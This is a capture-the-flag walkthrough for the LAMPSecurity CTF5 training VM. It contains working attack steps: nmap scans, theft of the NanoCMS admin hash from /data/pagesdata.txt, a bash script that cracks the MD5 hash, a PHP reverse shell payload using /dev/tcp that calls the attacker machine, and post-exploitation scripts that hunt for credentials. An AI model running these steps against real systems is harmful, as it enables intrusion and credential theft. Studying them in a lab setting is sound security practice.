- VM: LAMPSecurity: CTF5
- Goal: Gain root access
- Approach: solve without automated exploitation tools
nmap -sn 192.168.172.200-254
nmap -p- -A 192.168.172.240
- Port 22: OpenSSH 4.7
- Port 25: SMTP
- Port 80: Apache httpd 2.2.6
- Port 110: pop3 ipop3d 2006k.101
- Port 111: RPC #100000
- Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
- Port 143: University of Washington IMAP imapd 2006k.396
- Port 445: Samba 3.0.26a-6.fc8
- Port 901: Samba SWAT administration server
- Port 3306: MySQL 5.0.45
There are quite a few ports open. First, let's check out the website.
I tested the site for SQL injection but did not find any.
Then I identified a local file inclusion (LFI) vulnerability in the page parameter.
Further checking shows that the site uses NanoCMS for its blog (Blog tab).
A quick search for NanoCMS vulnerabilities showed that /data/pagesdata.txt exposes the admin password hash. Requesting that file on the target returned it:
username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd
The hash is 32 hex characters, so it is most likely MD5. I used the website md5decrypt.net and it found the password quickly: shannon. (On a real engagement, crack hashes locally with a wordlist rather than uploading client material to a third-party site; an online lookup is only acceptable for a throwaway CTF box.)
username: admin, password: shannon
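The same crack done offline, as an added example that is not part of the original write-up. It assumes bash with GNU coreutils (md5sum) and uses a small constructed wordlist; the hash-type guess is the same 32-hex-character heuristic used above, and the demo at the bottom runs the recovered NanoCMS hash through it.

```bash
#!/usr/bin/env bash
# Added example, not code from the original write-up: crack the NanoCMS hash
# offline instead of pasting it into a web service.
# Assumes bash and GNU coreutils (md5sum); the wordlist below is constructed.
set -u

# Guess the digest family from the hex length; 32 hex chars is MD5 (or NTLM).
guess_hash_type() {
    case "${#1}" in
        32) echo "md5/ntlm" ;;
        40) echo "sha1" ;;
        64) echo "sha256" ;;
        *)  echo "unknown" ;;
    esac
}

# Hex MD5 of a string with no trailing newline (echo would change the digest).
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# crack_md5 <hex-digest>: reads candidate words from stdin, prints the first
# match and returns 0; returns 1 if the wordlist is exhausted without a hit.
crack_md5() {
    local target word
    target=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_hex "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# Demo: the hash recovered from /data/pagesdata.txt against a constructed
# six-word list (a real run would pipe in rockyou.txt or similar).
hash=9d2f75377ac0ab991d40c91fd27e52fd
echo "type: $(guess_hash_type "$hash")"
printf '%s\n' password admin andy patrick shannon letmein |
    crack_md5 "$hash" || echo "no match in wordlist"
```

For anything beyond a toy list, `hashcat -m 0 hash.txt rockyou.txt` does the same job with GPU speed; the loop above exists to show that the whole operation needs nothing outside the attacking box.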
All right, a good start. Let's try it at the Admin Login on Andy's Blog page. Sure enough, it logs us into the NanoCMS Admin Panel.
Looking around the Admin Panel, I quickly spot something very interesting: 'New Page'. It lets me create new blog pages, so I create one containing a simple PHP snippet to test whether PHP code execution is allowed.
I added the page and then clicked the new blog page 'Testing' under Pages & Options.
Awesome. PHP code execution is allowed.
We can use the PHP code execution to get a reverse shell. First start Netcat on the Kali box listening on port 4444:
nc -lp 4444
Then modify the Testing blog page content to the following (the Kali box IP address is 192.168.172.110):
<?php system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1"); ?>
Note that PHP's system() hands the command line to /bin/sh, and the >& and /dev/tcp redirections are bash features. They work here because /bin/sh is bash on this Fedora 8 target; on a system where /bin/sh is dash, wrap the whole command as bash -c '...' so bash parses the redirections itself.
Now refresh the Testing blog page and watch the Kali box:
That's great. We have a shell as the user apache.
With shell access, we search the system for anything useful for gaining root: sudo rules, setuid commands, configuration files, and users' files.
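Those checks as a small set of shell functions, added here as an example and not part of the original write-up. It assumes bash on the target with GNU find and grep, and is meant to be pasted into the apache reverse shell (or saved to /tmp and sourced) rather than run from Kali.

```bash
#!/usr/bin/env bash
# Added example, not code from the original write-up: the post-exploitation
# checks listed in the write-up (sudo rules, setuid binaries, credentials in
# config and user files) as functions to run from the low-privilege shell.
# Assumes bash on the target with GNU find and grep.

# Lines mentioning a password under a directory tree. grep -R descends into
# dotfiles such as a user's .note, which a plain ls in the home dir would hide.
find_password_mentions() {
    grep -R -I -i -n -E 'passw(or)?d' "$1" 2>/dev/null
}

# setuid/setgid files on the local filesystem: each one is a privesc candidate
# worth comparing against the distribution's default set.
find_suid_binaries() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# sudo rules usable without a password. A bare sudo -l may prompt for a
# password and stall a reverse shell; -n makes it fail fast instead.
check_sudo() {
    sudo -n -l 2>/dev/null || echo "no passwordless sudo rules (or sudo absent)"
}

# Readable config files that commonly carry database or service credentials.
find_credential_configs() {
    find "${1:-/}" -xdev -type f -readable \
        \( -name '*.conf' -o -name '*.ini' -o -name '*.php' \) 2>/dev/null |
        xargs -r grep -l -i -E 'passw(or)?d|db_pass' 2>/dev/null
}
```

Typical use from the apache shell is `find_password_mentions /home`, `find_suid_binaries /` and `find_credential_configs /var/www`; the second and fourth walk the whole filesystem, so expect them to take a while on a real host.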
Luckily, a recursive search of /home for the word password turns up the root password:
grep -R -i password /home/* 2> /dev/null
The .note file in patrick's home directory contains what looks like the root password.
Root password: 50$cent
Let’s try it out
Bingo! Root access.